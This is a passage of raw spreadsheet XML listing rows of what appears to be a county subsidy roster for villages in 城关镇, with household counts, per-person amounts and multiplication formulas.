        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J364" s="24"/>
      <c r="K364" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="365" customHeight="1" spans="1:11">
      <c r="A365" s="23" t="s">
        <v>1101</v>
      </c>
      <c r="B365" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C365" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D365" s="24" t="s">
        <v>1102</v>
      </c>
      <c r="E365" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F365" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G365" s="24">
        <v>1</v>
      </c>
      <c r="H365" s="25">
        <v>365</v>
      </c>
      <c r="I365" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J365" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K365" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="366" customHeight="1" spans="1:11">
      <c r="A366" s="23" t="s">
        <v>1103</v>
      </c>
      <c r="B366" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C366" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D366" s="24" t="s">
        <v>1104</v>
      </c>
      <c r="E366" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F366" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G366" s="24">
        <v>1</v>
      </c>
      <c r="H366" s="25">
        <v>365</v>
      </c>
      <c r="I366" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J366" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K366" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="367" customHeight="1" spans="1:11">
      <c r="A367" s="23" t="s">
        <v>1105</v>
      </c>
      <c r="B367" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C367" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D367" s="24" t="s">
        <v>1106</v>
      </c>
      <c r="E367" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F367" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G367" s="24">
        <v>2</v>
      </c>
      <c r="H367" s="25">
        <v>325</v>
      </c>
      <c r="I367" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J367" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K367" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="368" customHeight="1" spans="1:11">
      <c r="A368" s="23" t="s">
        <v>1107</v>
      </c>
      <c r="B368" s="24" t="str">
        <f>B367</f>
        <v>城关镇</v>
      </c>
      <c r="C368" s="24" t="str">
        <f>C367</f>
        <v>西北村</v>
      </c>
      <c r="D368" s="23" t="s">
        <v>1108</v>
      </c>
      <c r="E368" s="23" t="s">
        <v>486</v>
      </c>
      <c r="F368" s="24" t="str">
        <f>F367</f>
        <v>4113210106</v>
      </c>
      <c r="G368" s="24"/>
      <c r="H368" s="24"/>
      <c r="I368" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J368" s="24"/>
      <c r="K368" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="369" customHeight="1" spans="1:11">
      <c r="A369" s="23" t="s">
        <v>1109</v>
      </c>
      <c r="B369" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C369" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D369" s="24" t="s">
        <v>1110</v>
      </c>
      <c r="E369" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F369" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G369" s="24">
        <v>1</v>
      </c>
      <c r="H369" s="25">
        <v>365</v>
      </c>
      <c r="I369" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J369" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K369" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="370" customHeight="1" spans="1:11">
      <c r="A370" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B370" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C370" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D370" s="24" t="s">
        <v>1112</v>
      </c>
      <c r="E370" s="24" t="s">
        <v>1113</v>
      </c>
      <c r="F370" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G370" s="24">
        <v>2</v>
      </c>
      <c r="H370" s="25">
        <v>325</v>
      </c>
      <c r="I370" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J370" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K370" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="371" customHeight="1" spans="1:11">
      <c r="A371" s="23" t="s">
        <v>1114</v>
      </c>
      <c r="B371" s="24" t="str">
        <f>B370</f>
        <v>城关镇</v>
      </c>
      <c r="C371" s="24" t="str">
        <f>C370</f>
        <v>东北村</v>
      </c>
      <c r="D371" s="23" t="s">
        <v>1115</v>
      </c>
      <c r="E371" s="23" t="s">
        <v>435</v>
      </c>
      <c r="F371" s="24" t="str">
        <f>F370</f>
        <v>4113210103</v>
      </c>
      <c r="G371" s="24"/>
      <c r="H371" s="24"/>
      <c r="I371" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J371" s="24"/>
      <c r="K371" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="372" customHeight="1" spans="1:11">
      <c r="A372" s="23" t="s">
        <v>1116</v>
      </c>
      <c r="B372" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C372" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D372" s="24" t="s">
        <v>1117</v>
      </c>
      <c r="E372" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F372" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G372" s="24">
        <v>2</v>
      </c>
      <c r="H372" s="25">
        <v>325</v>
      </c>
      <c r="I372" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J372" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K372" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="373" customHeight="1" spans="1:11">
      <c r="A373" s="23" t="s">
        <v>1118</v>
      </c>
      <c r="B373" s="24" t="str">
        <f>B372</f>
        <v>城关镇</v>
      </c>
      <c r="C373" s="24" t="str">
        <f>C372</f>
        <v>北外村</v>
      </c>
      <c r="D373" s="26" t="s">
        <v>1119</v>
      </c>
      <c r="E373" s="26" t="s">
        <v>1120</v>
      </c>
      <c r="F373" s="24" t="str">
        <f>F372</f>
        <v>4113210102</v>
      </c>
      <c r="G373" s="24"/>
      <c r="H373" s="24"/>
      <c r="I373" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J373" s="24"/>
      <c r="K373" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="374" customHeight="1" spans="1:11">
      <c r="A374" s="23" t="s">
        <v>1121</v>
      </c>
      <c r="B374" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C374" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D374" s="24" t="s">
        <v>1122</v>
      </c>
      <c r="E374" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F374" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G374" s="24">
        <v>1</v>
      </c>
      <c r="H374" s="25">
        <v>365</v>
      </c>
      <c r="I374" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J374" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K374" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="375" customHeight="1" spans="1:11">
      <c r="A375" s="23" t="s">
        <v>1123</v>
      </c>
      <c r="B375" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C375" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D375" s="24" t="s">
        <v>1124</v>
      </c>
      <c r="E375" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F375" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G375" s="24">
        <v>1</v>
      </c>
      <c r="H375" s="25">
        <v>365</v>
      </c>
      <c r="I375" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J375" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K375" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="376" customHeight="1" spans="1:11">
      <c r="A376" s="23" t="s">
        <v>1125</v>
      </c>
      <c r="B376" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C376" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D376" s="24" t="s">
        <v>1126</v>
      </c>
      <c r="E376" s="24" t="s">
        <v>1127</v>
      </c>
      <c r="F376" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G376" s="24">
        <v>1</v>
      </c>
      <c r="H376" s="25">
        <v>365</v>
      </c>
      <c r="I376" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J376" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K376" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="377" customHeight="1" spans="1:11">
      <c r="A377" s="23" t="s">
        <v>1128</v>
      </c>
      <c r="B377" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C377" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D377" s="24" t="s">
        <v>1129</v>
      </c>
      <c r="E377" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F377" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G377" s="24">
        <v>1</v>
      </c>
      <c r="H377" s="25">
        <v>365</v>
      </c>
      <c r="I377" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J377" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K377" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="378" customHeight="1" spans="1:11">
      <c r="A378" s="23" t="s">
        <v>1130</v>
      </c>
      <c r="B378" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C378" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D378" s="24" t="s">
        <v>1131</v>
      </c>
      <c r="E378" s="24" t="s">
        <v>1132</v>
      </c>
      <c r="F378" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G378" s="24">
        <v>2</v>
      </c>
      <c r="H378" s="25">
        <v>325</v>
      </c>
      <c r="I378" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J378" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K378" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="379" customHeight="1" spans="1:11">
      <c r="A379" s="23" t="s">
        <v>1133</v>
      </c>
      <c r="B379" s="24" t="str">
        <f>B378</f>
        <v>城关镇</v>
      </c>
      <c r="C379" s="24" t="str">
        <f>C378</f>
        <v>北外村</v>
      </c>
      <c r="D379" s="23" t="s">
        <v>1134</v>
      </c>
      <c r="E379" s="23" t="s">
        <v>1135</v>
      </c>
      <c r="F379" s="24" t="str">
        <f>F378</f>
        <v>4113210102</v>
      </c>
      <c r="G379" s="24"/>
      <c r="H379" s="24"/>
      <c r="I379" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J379" s="24"/>
      <c r="K379" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="380" customHeight="1" spans="1:11">
      <c r="A380" s="23" t="s">
        <v>1136</v>
      </c>
      <c r="B380" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C380" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D380" s="24" t="s">
        <v>1137</v>
      </c>
      <c r="E380" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F380" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G380" s="24">
        <v>1</v>
      </c>
      <c r="H380" s="25">
        <v>365</v>
      </c>
      <c r="I380" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J380" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K380" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="381" customHeight="1" spans="1:11">
      <c r="A381" s="23" t="s">
        <v>1138</v>
      </c>
      <c r="B381" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C381" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D381" s="24" t="s">
        <v>1139</v>
      </c>
      <c r="E381" s="24" t="s">
        <v>1140</v>
      </c>
      <c r="F381" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G381" s="24">
        <v>2</v>
      </c>
      <c r="H381" s="25">
        <v>325</v>
      </c>
      <c r="I381" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J381" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K381" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="382" customHeight="1" spans="1:11">
      <c r="A382" s="23" t="s">
        <v>1141</v>
      </c>
      <c r="B382" s="24" t="str">
        <f>B381</f>
        <v>城关镇</v>
      </c>
      <c r="C382" s="24" t="str">
        <f>C381</f>
        <v>北外村</v>
      </c>
      <c r="D382" s="23" t="s">
        <v>1142</v>
      </c>
      <c r="E382" s="23" t="s">
        <v>1143</v>
      </c>
      <c r="F382" s="24" t="str">
        <f>F381</f>
        <v>4113210102</v>
      </c>
      <c r="G382" s="24"/>
      <c r="H382" s="24"/>
      <c r="I382" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J382" s="24"/>
      <c r="K382" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="383" customHeight="1" spans="1:11">
      <c r="A383" s="23" t="s">
        <v>1144</v>
      </c>
      <c r="B383" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C383" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D383" s="24" t="s">
        <v>1145</v>
      </c>
      <c r="E383" s="24" t="s">
        <v>1146</v>
      </c>
      <c r="F383" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G383" s="24">
        <v>2</v>
      </c>
      <c r="H383" s="25">
        <v>325</v>
      </c>
      <c r="I383" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J383" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K383" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="384" customHeight="1" spans="1:11">
      <c r="A384" s="23" t="s">
        <v>1147</v>
      </c>
      <c r="B384" s="24" t="str">
        <f>B383</f>
        <v>城关镇</v>
      </c>
      <c r="C384" s="24" t="str">
        <f>C383</f>
        <v>东北村</v>
      </c>
      <c r="D384" s="24" t="s">
        <v>1148</v>
      </c>
      <c r="E384" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F384" s="24" t="str">
        <f>F383</f>
        <v>4113210103</v>
      </c>
      <c r="G384" s="24"/>
      <c r="H384" s="24"/>
      <c r="I384" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J384" s="24"/>
      <c r="K384" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="385" customHeight="1" spans="1:11">
      <c r="A385" s="23" t="s">
        <v>1149</v>
      </c>
      <c r="B385" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C385" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D385" s="24" t="s">
        <v>1150</v>
      </c>
      <c r="E385" s="24" t="s">
        <v>519</v>
      </c>
      <c r="F385" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G385" s="24">
        <v>2</v>
      </c>
      <c r="H385" s="25">
        <v>345</v>
      </c>
      <c r="I385" s="24">
        <f t="shared" si="5"/>
        <v>690</v>
      </c>
      <c r="J385" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K385" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="386" customHeight="1" spans="1:11">
      <c r="A386" s="23" t="s">
        <v>1151</v>
      </c>
      <c r="B386" s="24" t="str">
        <f>B385</f>
        <v>城关镇</v>
      </c>
      <c r="C386" s="24" t="str">
        <f>C385</f>
        <v>东北村</v>
      </c>
      <c r="D386" s="23" t="s">
        <v>1152</v>
      </c>
      <c r="E386" s="23" t="s">
        <v>624</v>
      </c>
      <c r="F386" s="24" t="str">
        <f>F385</f>
        <v>4113210103</v>
      </c>
      <c r="G386" s="24"/>
      <c r="H386" s="24"/>
      <c r="I386" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J386" s="24"/>
      <c r="K386" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="387" customHeight="1" spans="1:11">
      <c r="A387" s="23" t="s">
        <v>1153</v>
      </c>
      <c r="B387" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C387" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D387" s="24" t="s">
        <v>1154</v>
      </c>
      <c r="E387" s="24" t="s">
        <v>242</v>
      </c>
      <c r="F387" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G387" s="24">
        <v>2</v>
      </c>
      <c r="H387" s="25">
        <v>325</v>
      </c>
      <c r="I387" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J387" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K387" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="388" customHeight="1" spans="1:11">
      <c r="A388" s="23" t="s">
        <v>1155</v>
      </c>
      <c r="B388" s="24" t="str">
        <f>B387</f>
        <v>城关镇</v>
      </c>
      <c r="C388" s="24" t="str">
        <f>C387</f>
        <v>东北村</v>
      </c>
      <c r="D388" s="23" t="s">
        <v>1156</v>
      </c>
      <c r="E388" s="23" t="s">
        <v>1157</v>
      </c>
      <c r="F388" s="24" t="str">
        <f>F387</f>
        <v>4113210103</v>
      </c>
      <c r="G388" s="24"/>
      <c r="H388" s="24"/>
      <c r="I388" s="24">
        <f t="shared" ref="I388:I451" si="6">H388*G388</f>
        <v>0</v>
      </c>
      <c r="J388" s="24"/>
      <c r="K388" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="389" customHeight="1" spans="1:11">
      <c r="A389" s="23" t="s">
        <v>1158</v>
      </c>
      <c r="B389" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C389" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D389" s="24" t="s">
        <v>1159</v>
      </c>
      <c r="E389" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F389" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G389" s="24">
        <v>1</v>
      </c>
      <c r="H389" s="25">
        <v>365</v>
      </c>
      <c r="I389" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J389" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K389" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="390" customHeight="1" spans="1:11">
      <c r="A390" s="23" t="s">
        <v>1160</v>
      </c>
      <c r="B390" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C390" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D390" s="24" t="s">
        <v>1161</v>
      </c>
      <c r="E390" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F390" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G390" s="24">
        <v>1</v>
      </c>
      <c r="H390" s="25">
        <v>365</v>
      </c>
      <c r="I390" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J390" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K390" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="391" customHeight="1" spans="1:11">
      <c r="A391" s="23" t="s">
        <v>1162</v>
      </c>
      <c r="B391" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C391" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D391" s="24" t="s">
        <v>1163</v>
      </c>
      <c r="E391" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F391" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G391" s="24">
        <v>1</v>
      </c>
      <c r="H391" s="25">
        <v>365</v>
      </c>
      <c r="I391" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J391" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K391" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="392" customHeight="1" spans="1:11">
      <c r="A392" s="23" t="s">
        <v>1164</v>
      </c>
      <c r="B392" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C392" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D392" s="24" t="s">
        <v>1165</v>
      </c>
      <c r="E392" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F392" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G392" s="24">
        <v>1</v>
      </c>
      <c r="H392" s="25">
        <v>365</v>
      </c>
      <c r="I392" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J392" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K392" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="393" customHeight="1" spans="1:11">
      <c r="A393" s="23" t="s">
        <v>1166</v>
      </c>
      <c r="B393" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C393" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D393" s="24" t="s">
        <v>1167</v>
      </c>
      <c r="E393" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F393" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G393" s="24">
        <v>1</v>
      </c>
      <c r="H393" s="25">
        <v>365</v>
      </c>
      <c r="I393" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J393" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K393" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="394" customHeight="1" spans="1:11">
      <c r="A394" s="23" t="s">
        <v>1168</v>
      </c>
      <c r="B394" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C394" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D394" s="24" t="s">
        <v>1169</v>
      </c>
      <c r="E394" s="24" t="s">
        <v>1170</v>
      </c>
      <c r="F394" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G394" s="24">
        <v>1</v>
      </c>
      <c r="H394" s="25">
        <v>365</v>
      </c>
      <c r="I394" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J394" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K394" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="395" customHeight="1" spans="1:11">
      <c r="A395" s="23" t="s">
        <v>1171</v>
      </c>
      <c r="B395" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C395" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D395" s="24" t="s">
        <v>1172</v>
      </c>
      <c r="E395" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F395" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G395" s="24">
        <v>2</v>
      </c>
      <c r="H395" s="25">
        <v>325</v>
      </c>
      <c r="I395" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J395" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K395" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="396" customHeight="1" spans="1:11">
      <c r="A396" s="23" t="s">
        <v>1173</v>
      </c>
      <c r="B396" s="24" t="str">
        <f>B395</f>
        <v>城关镇</v>
      </c>
      <c r="C396" s="24" t="str">
        <f>C395</f>
        <v>西北村</v>
      </c>
      <c r="D396" s="23" t="s">
        <v>1174</v>
      </c>
      <c r="E396" s="23" t="s">
        <v>269</v>
      </c>
      <c r="F396" s="24" t="str">
        <f>F395</f>
        <v>4113210106</v>
      </c>
      <c r="G396" s="24"/>
      <c r="H396" s="24"/>
      <c r="I396" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J396" s="24"/>
      <c r="K396" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="397" customHeight="1" spans="1:11">
      <c r="A397" s="23" t="s">
        <v>1175</v>
      </c>
      <c r="B397" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C397" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D397" s="24" t="s">
        <v>1176</v>
      </c>
      <c r="E397" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F397" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G397" s="24">
        <v>1</v>
      </c>
      <c r="H397" s="25">
        <v>365</v>
      </c>
      <c r="I397" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J397" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K397" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="398" customHeight="1" spans="1:11">
      <c r="A398" s="23" t="s">
        <v>1177</v>
      </c>
      <c r="B398" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C398" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D398" s="24" t="s">
        <v>1178</v>
      </c>
      <c r="E398" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F398" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G398" s="24">
        <v>1</v>
      </c>
      <c r="H398" s="25">
        <v>365</v>
      </c>
      <c r="I398" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J398" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K398" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="399" customHeight="1" spans="1:11">
      <c r="A399" s="23" t="s">
        <v>1179</v>
      </c>
      <c r="B399" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C399" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D399" s="24" t="s">
        <v>1180</v>
      </c>
      <c r="E399" s="24" t="s">
        <v>1181</v>
      </c>
      <c r="F399" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G399" s="24">
        <v>2</v>
      </c>
      <c r="H399" s="25">
        <v>325</v>
      </c>
      <c r="I399" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J399" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K399" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="400" customHeight="1" spans="1:11">
      <c r="A400" s="23" t="s">
        <v>1182</v>
      </c>
      <c r="B400" s="24" t="str">
        <f>B399</f>
        <v>城关镇</v>
      </c>
      <c r="C400" s="24" t="str">
        <f>C399</f>
        <v>中华村</v>
      </c>
      <c r="D400" s="23" t="s">
        <v>1183</v>
      </c>
      <c r="E400" s="23" t="s">
        <v>1184</v>
      </c>
      <c r="F400" s="24" t="str">
        <f>F399</f>
        <v>4113210108</v>
      </c>
      <c r="G400" s="24"/>
      <c r="H400" s="24"/>
      <c r="I400" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J400" s="24"/>
      <c r="K400" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="401" customHeight="1" spans="1:11">
      <c r="A401" s="23" t="s">
        <v>1185</v>
      </c>
      <c r="B401" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C401" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D401" s="24" t="s">
        <v>1186</v>
      </c>
      <c r="E401" s="24" t="s">
        <v>416</v>
      </c>
      <c r="F401" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G401" s="24">
        <v>1</v>
      </c>
      <c r="H401" s="25">
        <v>365</v>
      </c>
      <c r="I401" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J401" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K401" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="402" customHeight="1" spans="1:11">
      <c r="A402" s="23" t="s">
        <v>1187</v>
      </c>
      <c r="B402" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C402" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D402" s="24" t="s">
        <v>1188</v>
      </c>
      <c r="E402" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F402" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G402" s="24">
        <v>1</v>
      </c>
      <c r="H402" s="25">
        <v>365</v>
      </c>
      <c r="I402" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J402" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K402" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="403" customHeight="1" spans="1:11">
      <c r="A403" s="23" t="s">
        <v>1189</v>
      </c>
      <c r="B403" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C403" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D403" s="24" t="s">
        <v>1190</v>
      </c>
      <c r="E403" s="24" t="s">
        <v>1191</v>
      </c>
      <c r="F403" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G403" s="24">
        <v>2</v>
      </c>
      <c r="H403" s="25">
        <v>325</v>
      </c>
      <c r="I403" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J403" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K403" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="404" customHeight="1" spans="1:11">
      <c r="A404" s="23" t="s">
        <v>1192</v>
      </c>
      <c r="B404" s="24" t="str">
        <f>B403</f>
        <v>城关镇</v>
      </c>
      <c r="C404" s="24" t="str">
        <f>C403</f>
        <v>中华村</v>
      </c>
      <c r="D404" s="23" t="s">
        <v>1193</v>
      </c>
      <c r="E404" s="23" t="s">
        <v>269</v>
      </c>
      <c r="F404" s="24" t="str">
        <f>F403</f>
        <v>4113210108</v>
      </c>
      <c r="G404" s="24"/>
      <c r="H404" s="24"/>
      <c r="I404" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J404" s="24"/>
      <c r="K404" s="24" t="s">
